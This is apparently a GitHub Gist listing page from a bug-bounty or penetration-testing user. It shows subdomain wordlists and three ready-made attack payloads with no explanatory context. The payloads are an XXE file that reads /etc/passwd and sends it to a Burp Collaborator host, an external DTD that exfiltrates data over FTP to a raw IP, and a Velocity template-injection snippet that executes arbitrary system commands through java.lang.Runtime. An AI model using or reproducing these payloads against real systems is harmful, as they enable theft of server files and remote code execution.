Skip to content

Instantly share code, notes, and snippets.

View 1stleveldomainsbycount
This file has been truncated, but you can view the full file.
www,719407
api,69552
eks,67581
svc,67131
cloudapp,65945
vpn,55659
bastion,53840
ax,40676
dev,38756
View evil.xml
<!ENTITY % xxePOC SYSTEM "file:///etc/passwd">
<!ENTITY % exfildata "<!ENTITY &#x25; exfil SYSTEM 'http://7u2bvf9vu78d9wepre2c3qmg87e82x.burpcollaborator.net/?x=%xxePOC;'>">
%exfildata;
%exfil;
View xxe.dtd
<!ENTITY % d SYSTEM "https://138.68.23.180:443">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://138.68.23.180:443/%d;'>">
View extracted-subdomains
This file has been truncated, but you can view the full file.
prestigegiftware
12boxing
7clouds
alfredhealth
mywell
phdrastreador
halorei
qa2static
hemoservice
View rce.vm
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
$scan.next()
#end